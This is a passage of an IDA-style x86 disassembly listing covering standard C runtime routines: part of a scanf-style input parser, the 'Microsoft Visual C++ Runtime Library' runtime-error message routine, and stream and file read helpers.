lea eax, [ebp-6Ch]
push eax
mov eax, [ebp-6Ch]
mov dword ptr [ebp-5Ch], 3Fh
push dword ptr [eax+0ACh]
lea eax, [ebp-50h]
push eax
lea eax, [ebp-5Ch]
push eax
call sub_40F3BD
mov ax, [ebp-5Ch]
add esp, 10h
mov [esi], ax
inc esi
inc esi
jmp loc_40974A
; ---------------------------------------------------------------------------
loc_40957C: ; CODE XREF: seg000:00409173�j
mov eax, ebx
sub eax, 70h
jz loc_4097A3
sub eax, 3
jz loc_40947C
dec eax
dec eax
jz loc_4097A7
sub eax, 3
jz loc_4091C1
sub eax, 3
jz short loc_4095CA
loc_4095A6: ; CODE XREF: seg000:00409193�j
; seg000:004091A6�j
movzx eax, byte ptr [edi]
cmp eax, [ebp-4]
jnz loc_409A31
dec byte ptr [ebp-15h]
cmp byte ptr [ebp-0Dh], 0
jnz loc_4099C1
mov eax, [ebp-70h]
mov [ebp-58h], eax
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_4095CA: ; CODE XREF: seg000:004095A4�j
cmp byte ptr [ebp-5], 0
jle short loc_4095D4
mov byte ptr [ebp-16h], 1
loc_4095D4: ; CODE XREF: seg000:004095CE�j
inc edi
cmp byte ptr [edi], 5Eh
mov esi, edi
jnz short loc_4095E3
lea esi, [edi+1]
mov byte ptr [ebp-18h], 0FFh
loc_4095E3: ; CODE XREF: seg000:004095DA�j
push 20h
lea eax, [ebp+168h]
push 0
push eax
call sub_407B70
add esp, 0Ch
cmp byte ptr [esi], 5Dh
jnz short loc_409607
mov dl, 5Dh
inc esi
mov byte ptr [ebp+173h], 20h
jmp short loc_409676
; ---------------------------------------------------------------------------
loc_409607: ; CODE XREF: seg000:004095F9�j
mov dl, [ebp-3Dh]
jmp short loc_409676
; ---------------------------------------------------------------------------
loc_40960C: ; CODE XREF: seg000:0040967A�j
inc esi
cmp al, 2Dh
jnz short loc_409659
test dl, dl
jz short loc_409659
mov cl, [esi]
cmp cl, 5Dh
jz short loc_409659
inc esi
cmp dl, cl
jnb short loc_409625
mov al, cl
jmp short loc_409629
; ---------------------------------------------------------------------------
loc_409625: ; CODE XREF: seg000:0040961F�j
mov al, dl
mov dl, cl
loc_409629: ; CODE XREF: seg000:00409623�j
cmp dl, al
ja short loc_409655
sub al, dl
inc al
movzx edi, dl
movzx edx, al
loc_409637: ; CODE XREF: seg000:00409650�j
mov ecx, edi
and ecx, 7
mov eax, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+168h]
or [eax], bl
inc edi
dec edx
jnz short loc_409637
mov ebx, [ebp-20h]
loc_409655: ; CODE XREF: seg000:0040962B�j
xor dl, dl
jmp short loc_409676
; ---------------------------------------------------------------------------
loc_409659: ; CODE XREF: seg000:0040960F�j
; seg000:00409613�j ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+168h]
or [eax], bl
mov ebx, [ebp-20h]
loc_409676: ; CODE XREF: seg000:00409605�j
; seg000:0040960A�j ...
mov al, [esi]
cmp al, 5Dh
jnz short loc_40960C
test al, al
jz loc_409A59
mov [ebp-28h], esi
mov esi, [ebp-38h]
jmp loc_409486
; ---------------------------------------------------------------------------
loc_40968F: ; CODE XREF: seg000:004091C7�j
cmp ebx, 2Bh
jnz short loc_4096B3
loc_409694: ; CODE XREF: seg000:004091D1�j
dec dword ptr [ebp-0Ch]
jnz short loc_4096A3
test ecx, ecx
jz short loc_4096A3
mov byte ptr [ebp+3], 1
jmp short loc_4096B3
; ---------------------------------------------------------------------------
loc_4096A3: ; CODE XREF: seg000:00409697�j
; seg000:0040969B�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
mov [ebp-4], ebx
loc_4096B3: ; CODE XREF: seg000:00409692�j
; seg000:004096A1�j
cmp ebx, 30h
jnz loc_4097D9
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
cmp bl, 78h
mov [ebp-4], ebx
jz short loc_409718
cmp bl, 58h
jz short loc_409718
cmp dword ptr [ebp-20h], 78h
mov dword ptr [ebp-1Ch], 1
jz short loc_4096FD
cmp dword ptr [ebp-2Ch], 0
jz short loc_4096F1
dec dword ptr [ebp-0Ch]
jnz short loc_4096F1
inc byte ptr [ebp+3]
loc_4096F1: ; CODE XREF: seg000:004096E7�j
; seg000:004096EC�j
mov dword ptr [ebp-20h], 6Fh
jmp loc_4097D9
; ---------------------------------------------------------------------------
loc_4096FD: ; CODE XREF: seg000:004096E1�j
dec dword ptr [ebp+4]
cmp ebx, 0FFFFFFFFh
jz short loc_409710
push dword ptr [ebp-14h]
push ebx
call sub_40F29F
pop ecx
pop ecx
loc_409710: ; CODE XREF: seg000:00409703�j
push 30h
pop ebx
jmp loc_4097D6
; ---------------------------------------------------------------------------
loc_409718: ; CODE XREF: seg000:004096CF�j
; seg000:004096D4�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
cmp dword ptr [ebp-2Ch], 0
mov ebx, eax
mov [ebp-4], ebx
jz short loc_40973B
sub dword ptr [ebp-0Ch], 2
cmp dword ptr [ebp-0Ch], 1
jge short loc_40973B
inc byte ptr [ebp+3]
loc_40973B: ; CODE XREF: seg000:0040972C�j
; seg000:00409736�j
mov dword ptr [ebp-20h], 78h
jmp loc_4097D9
; ---------------------------------------------------------------------------
loc_409747: ; CODE XREF: seg000:00409525�j
mov [esi], al
inc esi
loc_40974A: ; CODE XREF: seg000:00409577�j
mov [ebp-38h], esi
jmp loc_40949E
; ---------------------------------------------------------------------------
loc_409752: ; CODE XREF: seg000:0040951B�j
inc edi
jmp loc_40949E
; ---------------------------------------------------------------------------
loc_409758: ; CODE XREF: seg000:004094C3�j
; seg000:004094DB�j ...
dec dword ptr [ebp+4]
cmp eax, 0FFFFFFFFh
jz short loc_40976B
push dword ptr [ebp-14h]
push eax
call sub_40F29F
pop ecx
pop ecx
loc_40976B: ; CODE XREF: seg000:004094AC�j
; seg000:0040975E�j
cmp edi, esi
jz loc_409A59
cmp byte ptr [ebp-0Dh], 0
jnz loc_4099C1
inc dword ptr [ebp-3Ch]
cmp ebx, 63h
jz loc_4099C1
cmp byte ptr [ebp-16h], 0
mov eax, [ebp-38h]
jz short loc_40979B
and word ptr [eax], 0
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_40979B: ; CODE XREF: seg000:00409790�j
mov byte ptr [eax], 0
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_4097A3: ; CODE XREF: seg000:00409581�j
mov byte ptr [ebp-0Eh], 1
loc_4097A7: ; CODE XREF: seg000:00409179�j
; seg000:0040918D�j ...
mov ebx, [ebp-4]
cmp ebx, 2Dh
jnz short loc_4097B5
mov byte ptr [ebp-17h], 1
jmp short loc_4097BA
; ---------------------------------------------------------------------------
loc_4097B5: ; CODE XREF: seg000:004097AD�j
cmp ebx, 2Bh
jnz short loc_4097D9
loc_4097BA: ; CODE XREF: seg000:004097B3�j
dec dword ptr [ebp-0Ch]
jnz short loc_4097C9
test ecx, ecx
jz short loc_4097C9
mov byte ptr [ebp+3], 1
jmp short loc_4097D9
; ---------------------------------------------------------------------------
loc_4097C9: ; CODE XREF: seg000:004097BD�j
; seg000:004097C1�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
loc_4097D6: ; CODE XREF: seg000:00409713�j
mov [ebp-4], ebx
loc_4097D9: ; CODE XREF: seg000:004096B6�j
; seg000:004096F8�j ...
cmp dword ptr [ebp-48h], 0
jz loc_4098DE
cmp byte ptr [ebp+3], 0
jnz loc_4098B9
loc_4097ED: ; CODE XREF: seg000:004098A1�j
cmp dword ptr [ebp-20h], 78h
jz short loc_409842
cmp dword ptr [ebp-20h], 70h
jz short loc_409842
movzx eax, bl
push eax
call sub_40F17F
test eax, eax
pop ecx
jz loc_4098A6
cmp dword ptr [ebp-20h], 6Fh
jnz short loc_40982C
cmp ebx, 38h
jge loc_4098A6
mov eax, [ebp-30h]
mov esi, [ebp-34h]
shld eax, esi, 3
shl esi, 3
mov [ebp-30h], eax
jmp short loc_409877
; ---------------------------------------------------------------------------
loc_40982C: ; CODE XREF: seg000:0040980F�j
push 0
push 0Ah
push dword ptr [ebp-30h]
push dword ptr [ebp-34h]
call sub_40F4F0
mov esi, eax
mov [ebp-30h], edx
jmp short loc_409877
; ---------------------------------------------------------------------------
loc_409842: ; CODE XREF: seg000:004097F1�j
; seg000:004097F7�j
movzx edi, bl
push edi
call sub_40F1FC
test eax, eax
pop ecx
jz short loc_4098A6
mov eax, [ebp-30h]
mov esi, [ebp-34h]
shld eax, esi, 4
push edi
shl esi, 4
mov [ebp-30h], eax
call sub_40F17F
test eax, eax
pop ecx
movsx ebx, bl
jnz short loc_409874
and ebx, 0FFFFFFDFh
sub ebx, 7
loc_409874: ; CODE XREF: seg000:0040986C�j
mov [ebp-4], ebx
loc_409877: ; CODE XREF: seg000:0040982A�j
; seg000:00409840�j
inc dword ptr [ebp-1Ch]
lea eax, [ebx-30h]
cdq
add esi, eax
adc [ebp-30h], edx
cmp dword ptr [ebp-2Ch], 0
mov [ebp-34h], esi
jz short loc_409891
dec dword ptr [ebp-0Ch]
jz short loc_4098B9
loc_409891: ; CODE XREF: seg000:0040988A�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
mov [ebp-4], ebx
jmp loc_4097ED
; ---------------------------------------------------------------------------
loc_4098A6: ; CODE XREF: seg000:00409805�j
; seg000:00409814�j ...
dec dword ptr [ebp+4]
cmp ebx, 0FFFFFFFFh
jz short loc_4098B9
push dword ptr [ebp-14h]
push ebx
call sub_40F29F
pop ecx
pop ecx
loc_4098B9: ; CODE XREF: seg000:004097E7�j
; seg000:0040988F�j ...
cmp byte ptr [ebp-17h], 0
mov edi, [ebp-54h]
jz loc_409981
mov eax, [ebp-34h]
mov ecx, [ebp-30h]
neg eax
adc ecx, 0
neg ecx
mov [ebp-34h], eax
mov [ebp-30h], ecx
jmp loc_409981
; ---------------------------------------------------------------------------
loc_4098DE: ; CODE XREF: seg000:004097DD�j
cmp byte ptr [ebp+3], 0
mov edi, [ebp-54h]
jnz loc_409979
loc_4098EB: ; CODE XREF: seg000:00409964�j
cmp dword ptr [ebp-20h], 78h
jz short loc_40991A
cmp dword ptr [ebp-20h], 70h
jz short loc_40991A
movzx eax, bl
push eax
call sub_40F17F
test eax, eax
pop ecx
jz short loc_409966
cmp dword ptr [ebp-20h], 6Fh
jnz short loc_409915
cmp ebx, 38h
jge short loc_409966
shl edi, 3
jmp short loc_409942
; ---------------------------------------------------------------------------
loc_409915: ; CODE XREF: seg000:00409909�j
imul edi, 0Ah
jmp short loc_409942
; ---------------------------------------------------------------------------
loc_40991A: ; CODE XREF: seg000:004098EF�j
; seg000:004098F5�j
movzx esi, bl
push esi
call sub_40F1FC
test eax, eax
pop ecx
jz short loc_409966
push esi
shl edi, 4
call sub_40F17F
test eax, eax
pop ecx
movsx ebx, bl
jnz short loc_40993F
and ebx, 0FFFFFFDFh
sub ebx, 7
loc_40993F: ; CODE XREF: seg000:00409937�j
mov [ebp-4], ebx
loc_409942: ; CODE XREF: seg000:00409913�j
; seg000:00409918�j
inc dword ptr [ebp-1Ch]
cmp dword ptr [ebp-2Ch], 0
lea edi, [edi+ebx-30h]
jz short loc_409954
dec dword ptr [ebp-0Ch]
jz short loc_409979
loc_409954: ; CODE XREF: seg000:0040994D�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
mov [ebp-4], ebx
jmp short loc_4098EB
; ---------------------------------------------------------------------------
loc_409966: ; CODE XREF: seg000:00409903�j
; seg000:0040990E�j ...
dec dword ptr [ebp+4]
cmp ebx, 0FFFFFFFFh
jz short loc_409979
push dword ptr [ebp-14h]
push ebx
call sub_40F29F
pop ecx
pop ecx
loc_409979: ; CODE XREF: seg000:004098E5�j
; seg000:00409952�j ...
cmp byte ptr [ebp-17h], 0
jz short loc_409981
neg edi
loc_409981: ; CODE XREF: seg000:004098C0�j
; seg000:004098D9�j ...
cmp dword ptr [ebp-20h], 46h
jnz short loc_40998B
and dword ptr [ebp-1Ch], 0
loc_40998B: ; CODE XREF: seg000:00409985�j
cmp dword ptr [ebp-1Ch], 0
jz loc_409A59
cmp byte ptr [ebp-0Dh], 0
jnz short loc_4099C1
inc dword ptr [ebp-3Ch]
mov esi, [ebp-38h]
loc_4099A1: ; CODE XREF: seg000:004091B3�j
cmp dword ptr [ebp-48h], 0
jz short loc_4099B4
mov eax, [ebp-34h]
mov [esi], eax
mov eax, [ebp-30h]
mov [esi+4], eax
jmp short loc_4099C1
; ---------------------------------------------------------------------------
loc_4099B4: ; CODE XREF: seg000:004099A5�j
cmp byte ptr [ebp-0Eh], 0
jz short loc_4099BE
mov [esi], edi
jmp short loc_4099C1
; ---------------------------------------------------------------------------
loc_4099BE: ; CODE XREF: seg000:004099B8�j
mov [esi], di
loc_4099C1: ; CODE XREF: seg000:004091B9�j
; seg000:0040943A�j ...
mov edi, [ebp-28h]
inc byte ptr [ebp-15h]
inc edi
mov [ebp-28h], edi
jmp short loc_409A0F
; ---------------------------------------------------------------------------
loc_4099CD: ; CODE XREF: seg000:00408FE3�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
movzx eax, byte ptr [edi]
inc edi
cmp eax, ebx
mov [ebp-4], ebx
mov [ebp-28h], edi
jnz short loc_409A47
movzx eax, bl
push eax
call sub_40CA36
test eax, eax
pop ecx
jz short loc_409A0F
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
movzx ecx, byte ptr [edi]
inc edi
cmp ecx, eax
mov [ebp-28h], edi
jnz short loc_409A37
dec dword ptr [ebp+4]
loc_409A0F: ; CODE XREF: seg000:004099CB�j
; seg000:004099F4�j
cmp dword ptr [ebp-4], 0FFFFFFFFh
jnz short loc_409A25
cmp byte ptr [edi], 25h
jnz short loc_409A59
mov eax, [ebp-28h]
cmp byte ptr [eax+1], 6Eh
jnz short loc_409A59
mov edi, eax
loc_409A25: ; CODE XREF: seg000:00408FDB�j
; seg000:00409A13�j
mov al, [edi]
test al, al
jnz loc_408F9F
jmp short loc_409A59
; ---------------------------------------------------------------------------
loc_409A31: ; CODE XREF: seg000:0040916A�j
; seg000:004095AC�j
cmp dword ptr [ebp-4], 0FFFFFFFFh
jmp short loc_409A4A
; ---------------------------------------------------------------------------
loc_409A37: ; CODE XREF: seg000:00409A0A�j
cmp eax, 0FFFFFFFFh
jz short loc_409A47
push dword ptr [ebp-14h]
push eax
call sub_40F29F
pop ecx
pop ecx
loc_409A47: ; CODE XREF: seg000:004099E6�j
; seg000:00409A3A�j
cmp ebx, 0FFFFFFFFh
loc_409A4A: ; CODE XREF: seg000:00409A35�j
jz short loc_409A59
push dword ptr [ebp-14h]
push dword ptr [ebp-4]
call sub_40F29F
pop ecx
pop ecx
loc_409A59: ; CODE XREF: seg000:00409153�j
; seg000:0040923E�j ...
cmp dword ptr [ebp-44h], 1
jnz short loc_409A68
push dword ptr [ebp-24h]
call sub_403603
pop ecx
loc_409A68: ; CODE XREF: seg000:00409A5D�j
cmp dword ptr [ebp-4], 0FFFFFFFFh
jnz short loc_409A8C
mov eax, [ebp-3Ch]
test eax, eax
jnz short loc_409A7D
cmp [ebp-15h], al
jnz short loc_409A7D
or eax, 0FFFFFFFFh
loc_409A7D: ; CODE XREF: seg000:00409A73�j
; seg000:00409A78�j
cmp byte ptr [ebp-60h], 0
jz short loc_409A9C
mov ecx, [ebp-64h]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_409A9C
; ---------------------------------------------------------------------------
loc_409A8C: ; CODE XREF: seg000:00408F96�j
; seg000:00409A6C�j
cmp byte ptr [ebp-60h], 0
jz short loc_409A99
mov eax, [ebp-64h]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_409A99: ; CODE XREF: seg000:00409A90�j
mov eax, [ebp-3Ch]
loc_409A9C: ; CODE XREF: seg000:00408ED7�j
; seg000:00409A81�j ...
mov ecx, [ebp+188h]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 18Ch
leave
retn
; =============== S U B R O U T I N E =======================================
sub_409AB4 proc near ; CODE XREF: sub_4036E0+2A�p
; sub_403ED3+12�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
mov ebx, [esp+8+arg_0]
push esi
push edi
xor esi, esi
xor edi, edi
loc_409AC0: ; CODE XREF: sub_409AB4+19�j
cmp ebx, ds:dword_423C00[edi*8]
jz short loc_409ACF
inc edi
cmp edi, 17h
jl short loc_409AC0
loc_409ACF: ; CODE XREF: sub_409AB4+13�j
cmp edi, 17h
jnb loc_409C4F
push ebp
push 3
call sub_40F6C2
cmp eax, 1
pop ecx
jz loc_409C1B
push 3
call sub_40F6C2
test eax, eax
pop ecx
jnz short loc_409B03
cmp ds:dword_423050, 1
jz loc_409C1B
loc_409B03: ; CODE XREF: sub_409AB4+40�j
cmp ebx, 0FCh
jz loc_409C4E
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
mov ebx, 314h
push ebx
mov ebp, offset dword_425FD8
push ebp
call sub_4076D5
add esp, 0Ch
test eax, eax
jz short loc_409B39
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_409B39: ; CODE XREF: sub_409AB4+76�j
push 104h
mov esi, offset byte_425FF1
push esi
push 0
mov ds:byte_4260F5, 0
call ds:dword_41D060
test eax, eax
jnz short loc_409B7D
push offset aProgramNameUnk ; "<program name unknown>"
push 2FBh
push esi
call sub_4076D5
add esp, 0Ch
test eax, eax
jz short loc_409B7D
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402E3D
add esp, 14h
loc_409B7D: ; CODE XREF: sub_409AB4+A1�j
; sub_409AB4+B8�j
push esi
call sub_404130
inc eax
cmp eax, 3Ch
pop ecx
jbe short loc_409BC2
push esi
call sub_404130
sub esi, 3Bh
add eax, esi
push 3
mov ecx, offset dword_4262EC
push offset a___ ; "..."
sub ecx, eax
push ecx
push eax
call sub_40C846
add esp, 14h
test eax, eax
jz short loc_409BC2
xor esi, esi
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
jmp short loc_409BC4
; ---------------------------------------------------------------------------
loc_409BC2: ; CODE XREF: sub_409AB4+D4�j
; sub_409AB4+FB�j
xor esi, esi
loc_409BC4: ; CODE XREF: sub_409AB4+10C�j
push offset asc_41DB10 ; "\n\n"
push ebx
push ebp
call sub_40C78D
add esp, 0Ch
test eax, eax
jz short loc_409BE4
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_409BE4: ; CODE XREF: sub_409AB4+121�j
push ds:off_423C04[edi*8]
push ebx
push ebp
call sub_40C78D
add esp, 0Ch
test eax, eax
jz short loc_409C06
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_409C06: ; CODE XREF: sub_409AB4+143�j
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push ebp
call sub_40F524
add esp, 0Ch
jmp short loc_409C4E
; ---------------------------------------------------------------------------
loc_409C1B: ; CODE XREF: sub_409AB4+30�j
; sub_409AB4+49�j
push 0FFFFFFF4h
call ds:dword_41D14C
mov ebp, eax
cmp ebp, esi
jz short loc_409C4E
cmp ebp, 0FFFFFFFFh
jz short loc_409C4E
push 0
lea eax, [esp+18h+var_4]
push eax
lea esi, ds:423C04h[edi*8]
push dword ptr [esi]
call sub_404130
pop ecx
push eax
push dword ptr [esi]
push ebp
call ds:dword_41D088
loc_409C4E: ; CODE XREF: sub_409AB4+55�j
; sub_409AB4+165�j ...
pop ebp
loc_409C4F: ; CODE XREF: sub_409AB4+1E�j
pop edi
pop esi
pop ebx
pop ecx
retn
sub_409AB4 endp
; =============== S U B R O U T I N E =======================================
sub_409C54 proc near ; CODE XREF: sub_4036E0+23�p
; sub_403ED3+9�p ...
push 3
call sub_40F6C2
cmp eax, 1
pop ecx
jz short loc_409C76
push 3
call sub_40F6C2
test eax, eax
pop ecx
jnz short locret_409C8C
cmp ds:dword_423050, 1
jnz short locret_409C8C
loc_409C76: ; CODE XREF: sub_409C54+B�j
push 0FCh
call sub_409AB4
push 0FFh
call sub_409AB4
pop ecx
pop ecx
locret_409C8C: ; CODE XREF: sub_409C54+17�j
; sub_409C54+20�j
retn
sub_409C54 endp
; =============== S U B R O U T I N E =======================================
sub_409C8D proc near ; CODE XREF: sub_403B22+ED�p
; sub_408E2C+F�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
cmp esi, edi
jnz short loc_409CB6
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
jmp loc_409DA7
; ---------------------------------------------------------------------------
loc_409CB6: ; CODE XREF: sub_409C8D+A�j
mov eax, [esi+0Ch]
test al, 83h
jz loc_409DA7
test al, 40h
jnz loc_409DA7
test al, 2
jz short loc_409CD8
or eax, 20h
mov [esi+0Ch], eax
jmp loc_409DA7
; ---------------------------------------------------------------------------
loc_409CD8: ; CODE XREF: sub_409C8D+3E�j
or eax, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_409CED
push esi
call sub_40D4FC
pop ecx
jmp short loc_409CF2
; ---------------------------------------------------------------------------
loc_409CED: ; CODE XREF: sub_409C8D+55�j
mov eax, [esi+8]
mov [esi], eax
loc_409CF2: ; CODE XREF: sub_409C8D+5E�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push esi
call sub_408A20
pop ecx
push eax
call sub_40A34F
add esp, 0Ch
cmp eax, edi
mov [esi+4], eax
jz loc_409D97
cmp eax, 0FFFFFFFFh
jz short loc_409D97
test byte ptr [esi+0Ch], 82h
jnz short loc_409D6D
push esi
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_409D58
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_409D58
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_409D5D
; ---------------------------------------------------------------------------
loc_409D58: ; CODE XREF: sub_409C8D+9B�j
; sub_409C8D+A7�j
mov eax, offset dword_423BD0
loc_409D5D: ; CODE XREF: sub_409C8D+C9�j
mov al, [eax+4]
and al, 82h
cmp al, 82h
jnz short loc_409D6D
or dword ptr [esi+0Ch], 2000h
loc_409D6D: ; CODE XREF: sub_409C8D+8F�j
; sub_409C8D+D7�j
cmp dword ptr [esi+18h], 200h
jnz short loc_409D8A
mov eax, [esi+0Ch]
test al, 8
jz short loc_409D8A
test ax, 400h
jnz short loc_409D8A
mov dword ptr [esi+18h], 1000h
loc_409D8A: ; CODE XREF: sub_409C8D+E7�j
; sub_409C8D+EE�j ...
mov ecx, [esi]
dec dword ptr [esi+4]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_409DAA
; ---------------------------------------------------------------------------
loc_409D97: ; CODE XREF: sub_409C8D+80�j
; sub_409C8D+89�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
mov [esi+4], edi
loc_409DA7: ; CODE XREF: sub_409C8D+24�j
; sub_409C8D+2E�j ...
or eax, 0FFFFFFFFh
loc_409DAA: ; CODE XREF: sub_409C8D+108�j
pop edi
pop esi
retn
sub_409C8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409DAD proc near ; CODE XREF: sub_40A34F+9A�p
; sub_40E072+355�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = word ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
mov edx, [ebp+arg_8]
push esi
mov esi, [ebp+arg_0]
push 0FFFFFFFEh
pop eax
cmp esi, eax
mov [ebp+var_14], eax
mov [ebp+var_1C], edx
jnz short loc_409DE2
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
jmp loc_40A34C
; ---------------------------------------------------------------------------
loc_409DE2: ; CODE XREF: sub_409DAD+18�j
push edi
xor edi, edi
cmp esi, edi
jl short loc_409DF1
cmp esi, ds:dword_433C84
jb short loc_409E18
loc_409DF1: ; CODE XREF: sub_409DAD+3A�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 9
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_40A34B
; ---------------------------------------------------------------------------
loc_409E18: ; CODE XREF: sub_409DAD+42�j
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
push ebx
lea ebx, ds:433CA0h[eax*4]
mov eax, [ebx]
add eax, esi
mov cl, [eax+4]
test cl, 1
jnz short loc_409E4E
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
jmp loc_409F95
; ---------------------------------------------------------------------------
loc_409E4E: ; CODE XREF: sub_409DAD+88�j
cmp edx, edi
mov [ebp+var_10], edi
jz loc_40A348
test cl, 2
jnz loc_40A348
mov ecx, [ebp+arg_4]
cmp ecx, edi
jz loc_409F83
mov al, [eax+24h]
add al, al
sar al, 1
mov [ebp+var_2], al
movsx eax, al
dec eax
jz loc_409F7B
dec eax
jnz short loc_409E96
mov eax, edx
not eax
test al, 1
jz loc_409F83
and edx, 0FFFFFFFEh
mov [ebp+arg_8], edx
loc_409E96: ; CODE XREF: sub_409DAD+D5�j
mov [ebp+var_C], ecx
loc_409E99: ; CODE XREF: sub_409DAD+216�j
mov ecx, [ebx]
mov eax, [ebp+var_C]
lea edi, [esi+ecx]
test byte ptr [edi+4], 48h
jz short loc_409F1D
mov cl, [edi+5]
cmp cl, 0Ah
jz short loc_409F1D
xor edx, edx
cmp [ebp+arg_8], edx
jz short loc_409F1D
mov [eax], cl
mov ecx, [ebx]
inc eax
dec [ebp+arg_8]
cmp [ebp+var_2], dl
mov [ebp+var_10], 1
mov byte ptr [esi+ecx+5], 0Ah
jz short loc_409F1D
mov ecx, [ebx]
mov cl, [esi+ecx+25h]
cmp cl, 0Ah
jz short loc_409F1D
cmp [ebp+arg_8], edx
jz short loc_409F1D
mov [eax], cl
mov ecx, [ebx]
inc eax
dec [ebp+arg_8]
cmp [ebp+var_2], 1
mov [ebp+var_10], 2
mov byte ptr [esi+ecx+25h], 0Ah
jnz short loc_409F1D
mov ecx, [ebx]
mov cl, [esi+ecx+26h]
cmp cl, 0Ah
jz short loc_409F1D
cmp [ebp+arg_8], edx
jz short loc_409F1D
mov [eax], cl
mov ecx, [ebx]
inc eax
dec [ebp+arg_8]
mov [ebp+var_10], 3
mov byte ptr [esi+ecx+26h], 0Ah
loc_409F1D: ; CODE XREF: sub_409DAD+F8�j
; sub_409DAD+100�j ...
push 0
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_8]
push eax
mov eax, [ebx]
push dword ptr [esi+eax]
call ds:dword_41D078
test eax, eax
jz loc_40A312
mov edi, [ebp+var_18]
test edi, edi
jl loc_40A312
cmp edi, [ebp+arg_8]
ja loc_40A312
mov eax, [ebx]
add [ebp+var_10], edi
lea eax, [esi+eax+4]
test byte ptr [eax], 80h
jz loc_40A1B2
cmp [ebp+var_2], 2
jz loc_40A1DC
test edi, edi
jz short loc_409FE7
mov ecx, [ebp+var_C]
cmp byte ptr [ecx], 0Ah
jnz short loc_409FE7
or byte ptr [eax], 4
jmp short loc_409FEA
; ---------------------------------------------------------------------------
loc_409F7B: ; CODE XREF: sub_409DAD+CE�j
mov eax, edx
not eax
test al, 1
jnz short loc_409FA4
loc_409F83: ; CODE XREF: sub_409DAD+BA�j
; sub_409DAD+DD�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 16h
loc_409F95: ; CODE XREF: sub_409DAD+9C�j
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_409FDF
; ---------------------------------------------------------------------------
loc_409FA4: ; CODE XREF: sub_409DAD+1D4�j
mov eax, edx
push 4
pop ecx
shr eax, 1
cmp eax, ecx
mov [ebp+arg_8], ecx
jb short loc_409FB5
mov [ebp+arg_8], eax
loc_409FB5: ; CODE XREF: sub_409DAD+203�j
push [ebp+arg_8]
call sub_40773A
cmp eax, edi
pop ecx
mov [ebp+var_C], eax
jnz loc_409E99
call sub_4057D3
mov dword ptr [eax], 0Ch
call sub_4057E6
mov dword ptr [eax], 8
loc_409FDF: ; CODE XREF: sub_409DAD+1F5�j
or eax, 0FFFFFFFFh
jmp loc_40A34A
; ---------------------------------------------------------------------------
loc_409FE7: ; CODE XREF: sub_409DAD+1BF�j
; sub_409DAD+1C7�j
and byte ptr [eax], 0FBh
loc_409FEA: ; CODE XREF: sub_409DAD+1CC�j
mov edi, [ebp+var_C]
mov eax, [ebp+var_10]
add eax, edi
cmp edi, eax
mov [ebp+arg_8], edi
mov [ebp+var_10], eax
jnb loc_40A0D0
loc_40A000: ; CODE XREF: sub_409DAD+306�j
mov ecx, [ebp+arg_8]
mov al, [ecx]
cmp al, 1Ah
jz loc_40A0BB
cmp al, 0Dh
jz short loc_40A01D
mov [edi], al
inc edi
inc ecx
